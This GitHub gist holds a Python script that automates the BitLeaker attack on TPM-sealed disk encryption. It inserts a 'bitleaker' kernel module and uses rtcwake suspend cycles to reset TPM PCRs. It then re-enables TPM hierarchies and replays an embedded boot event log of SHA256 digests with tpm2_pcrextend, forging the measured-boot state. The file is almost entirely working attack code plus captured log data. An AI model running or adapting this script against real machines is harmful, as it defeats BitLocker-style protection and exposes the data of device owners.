Skip to content

Instantly share code, notes, and snippets.

@edmcman
Created May 5, 2023 20:54
Show Gist options
  • Save edmcman/35c1b830854804a1847949795409d163 to your computer and use it in GitHub Desktop.
Save edmcman/35c1b830854804a1847949795409d163 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
import subprocess
SUSPEND_TIME = 15
WAIT_TIME = 30
kmod = "/home/ed/Documents/bitleaker/bitleaker-kernel-module/bitleaker-kernel-module.ko"
log = """[ 530.761011] bitleaker: [1] PCR 0, Event 7, SHA256= af 40 9d 41 7b 30 01 75 70 d4 a7 56 fe fa 9a 46 d9 0c 2b 48 cc f2 f0 8b ea 8f c4 14 62 1c e8 8d
[ 530.761037] bitleaker: [2] PCR 0, Event 8, SHA256= d4 72 0b 40 09 43 82 13 b8 03 56 80 17 f9 03 09 3f 6b ea 8a b4 7d 28 3d b3 2b 6e ab ed bb f1 55
[ 530.761062] bitleaker: [3] PCR 0, Event 1, SHA256= 2f 2f 79 31 1f 5e 4f 45 06 97 1c 36 8e d2 5d 02 64 f1 f6 14 88 71 63 d9 6c 9a bb 09 6f c0 83 5d
[ 530.761099] bitleaker: [4] PCR 7, Event 80000001, SHA256= cc fc 4b b3 28 88 a3 45 bc 8a ea da ba 55 2b 62 7d 99 34 8c 76 76 81 ab 31 41 f5 b0 1e 40 a4 0e
[ 530.761122] bitleaker: [5] PCR 7, Event 80000001, SHA256= 2a bf e9 86 5a 65 41 02 ac b1 2f 0f ef e5 2d c4 d0 1b ce 40 90 14 10 eb 3d ad af 21 27 00 a2 b7
[ 530.761145] bitleaker: [6] PCR 7, Event 80000001, SHA256= 63 a5 25 13 4b fb c2 42 05 8c 0e 6b 42 79 4f 8b 1d 14 2d 13 02 9a 9a a3 8a 32 72 c5 ca 23 90 c5
[ 530.761167] bitleaker: [7] PCR 7, Event 80000001, SHA256= ad 18 50 a4 88 56 28 d8 62 73 ba d7 43 77 9c 9e 66 5d b0 60 23 62 70 b5 d2 4d d9 8f 3a 22 fe 86
[ 530.761184] bitleaker: [8] PCR 7, Event 80000001, SHA256= b7 6e 24 46 f7 d5 7c c8 ef c9 63 ec a0 b3 07 66 e5 d8 26 58 3e ec db 87 28 f0 a5 43 5a ea e6 3c
[ 530.761198] bitleaker: [9] PCR 7, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761214] bitleaker: [10] PCR 6, Event c, SHA256= d1 08 83 fc 1b ac 39 20 ba d3 f4 49 f8 f4 92 64 d5 ee da d6 42 2c f2 f4 d7 10 b1 a2 5f de a6 17
[ 530.761228] bitleaker: [11] PCR 6, Event c, SHA256= 3a 9a b5 79 28 1f 92 46 66 f8 e8 24 9d 8d 5f a4 11 18 15 e7 c0 a7 00 3a 7c 51 1b b4 85 a5 62 af
[ 530.761242] bitleaker: [12] PCR 6, Event c, SHA256= 89 2f a7 1b af cf 98 5c 9d b5 f5 25 31 11 e8 6e bd 80 46 df a8 2e 97 11 06 06 18 2e cb af ba 93
[ 530.761256] bitleaker: [13] PCR 1, Event 80000009, SHA256= a3 39 ce 57 4d c3 05 c6 10 2f 91 d4 5f 87 5b 5c 04 dc 7c af 15 ff 7e 3c d6 16 65 33 89 18 2c 6c
[ 530.761269] bitleaker: [14] PCR 1, Event 80000009, SHA256= 7b 19 1f 8c 08 38 70 c0 d0 e8 91 c4 ee b7 ec c7 e1 2a ca 76 0f 54 e0 ef d4 56 76 ad ad 80 50 f5
[ 530.761283] bitleaker: [15] PCR 1, Event a, SHA256= 6a 21 ab 30 93 d3 11 7b 9a 2f 46 f8 1b 90 55 60 87 fe 26 6c 96 ef dd 01 c1 f5 06 fa c7 28 91 4b
[ 530.761297] bitleaker: [16] PCR 0, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761313] bitleaker: [17] PCR 1, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761328] bitleaker: [18] PCR 2, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761344] bitleaker: [19] PCR 3, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761358] bitleaker: [20] PCR 4, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761372] bitleaker: [21] PCR 5, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761386] bitleaker: [22] PCR 6, Event 4, SHA256= df 3f 61 98 04 a9 2f db 40 57 19 2d c4 3d d7 48 ea 77 8a dc 52 bc 49 8c e8 05 24 c0 14 b8 11 19
[ 530.761400] bitleaker: [23] PCR 5, Event 80000006, SHA256= d4 cb 1d 7f 9a 55 a4 c5 ba fa d4 17 ce ad d0 37 57 24 97 6a eb cf d5 a2 e5 df 3c df 51 de 41 7b
[ 530.761422] bitleaker: [24] PCR 1, Event 80000002, SHA256= 76 84 9d e3 33 5d be 53 bf 76 06 e0 e3 5d 35 7b 8f 5b ad 04 35 ef e6 33 81 7e b4 15 80 8c 4f 4d
[ 530.761445] bitleaker: [25] PCR 1, Event 80000002, SHA256= 54 39 a1 18 7c 01 de 49 72 3d 1b 72 61 aa a2 e9 2f 15 44 7e 75 23 ba 27 8d 22 bd 9e 87 fa 34 24
[ 530.761468] bitleaker: [26] PCR 1, Event 80000002, SHA256= 37 13 95 84 ec 31 af 55 96 8b 92 3e 0e 39 04 1e 9a 7c 75 e8 56 cb 3a 0f 83 0f b3 1a 06 01 a4 f1
[ 530.761491] bitleaker: [27] PCR 1, Event 80000002, SHA256= e0 7b 5e de 97 cd d7 0d bf a3 99 49 5f ab 67 2a b3 38 03 bc 9e 48 d4 35 ce 77 88 68 99 76 da 6b
[ 530.761514] bitleaker: [28] PCR 1, Event 80000002, SHA256= bb 9f 14 0c 92 2d f4 5a 09 d5 1c 8e f5 7e 9c 3d 21 01 41 ff 61 53 d9 a0 48 c6 41 5f 09 1a fe ca
[ 530.761537] bitleaker: [29] PCR 1, Event 80000001, SHA256= 08 22 71 25 5d cc b5 fe 8d 86 90 89 78 b9 eb 67 88 1b 49 c7 eb 0e 04 fa f8 bf 23 f3 77 fd 0b f2
[ 530.761560] bitleaker: [30] PCR 1, Event 80000001, SHA256= b7 0b 7c 1b 92 20 9a f6 6d 79 d1 2d ec 1f 14 f4 b8 c7 1c 0c 69 be 22 a1 a0 4f 5c 58 04 e2 6e c3
[ 530.761583] bitleaker: [31] PCR 1, Event 80000009, SHA256= fa 06 82 97 11 ec dc bd d4 36 12 05 d1 b9 1e aa 47 15 20 cf d1 fd 3a 99 19 04 27 1e 37 85 ff 77
[ 530.761628] bitleaker: [33] PCR 4, Event 80000003, SHA256= db ff d7 0a 2c 43 fd 2c 19 31 f1 8b 8f 8c 08 c5 18 1d b1 5f 99 6f 74 7d fe d3 4d ef 52 fa d0 36
[ 530.761650] bitleaker: [34] PCR 14, Event d, SHA256= 79 03 68 4e 36 3a 60 e0 96 f5 69 f3 06 75 72 d5 84 46 6a fe 5e 7f e6 91 44 60 57 18 d2 87 42 23
[ 530.761672] bitleaker: [35] PCR 14, Event d, SHA256= 8d 8a 3a ae 50 d5 d2 58 38 c9 5c 03 4a ad ce 7b 54 8c 9a 95 2e b7 92 5e 36 6e da 53 7c 59 c3 b0
[ 530.761717] bitleaker: [37] PCR 14, Event d, SHA256= 4b f5 12 2f 34 45 54 c5 3b de 2e bb 8c d2 b7 e3 d1 60 0a d6 31 c3 85 a5 d7 cc e2 3c 77 85 45 9a
[ 530.761761] bitleaker: [39] PCR 4, Event 80000003, SHA256= 3b 4a dc 2b 7b d1 89 21 20 56 07 b0 30 0f 71 31 30 27 7f b5 46 a5 bf 08 63 b8 c1 8f 01 f3 08 db
"""
def parse_line(l):
#print(l)
a = l.split(' ')
pcr = int(a[6][0:-1])
sha = "".join(a[10:])
return (pcr, sha)
#print(log)
def wait():
print("Waiting %d seconds" % WAIT_TIME)
subprocess.run("sleep %d" % WAIT_TIME, shell=True)
def sleep():
#subprocess.run("pm-suspend")
subprocess.run("rtcwake -m mem -s %d" % SUSPEND_TIME, shell=True)
#subprocess.run("systemctl suspend", shell=True)
def reset_pcrs():
print("Inserting kernel module")
subprocess.run("insmod %s" % kmod, shell=True)
print("Sleeping and waking")
sleep()
print("Removing kernel module")
subprocess.run("rmmod %s" % kmod, shell=True)
print("Sleeping and waking")
wait()
sleep()
print("Awake, restoring hierarchy")
wait()
subprocess.run("sleep %d" % WAIT_TIME, shell=True)
subprocess.run("tpm2_hierarchycontrol -C p shEnable set", shell=True)
subprocess.run("tpm2_hierarchycontrol -C p ehEnable set", shell=True)
def set_pcrs():
pcrs = [parse_line(l) for l in log.splitlines()]
# bootfwmgr.efi...
pcrs.append((7, "30bf464ee37f1bc0c7b1a5bf25eced275347c3ab1492d5623ae9f7663be07dd5"))
for pcr, sha in pcrs:
print("PCR %d: SHA:%s" % (pcr, sha))
cmd = "tpm2_pcrextend %d:sha256=%s" % (pcr, sha)
print(cmd)
subprocess.run(cmd, shell=True)
reset_pcrs()
set_pcrs()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment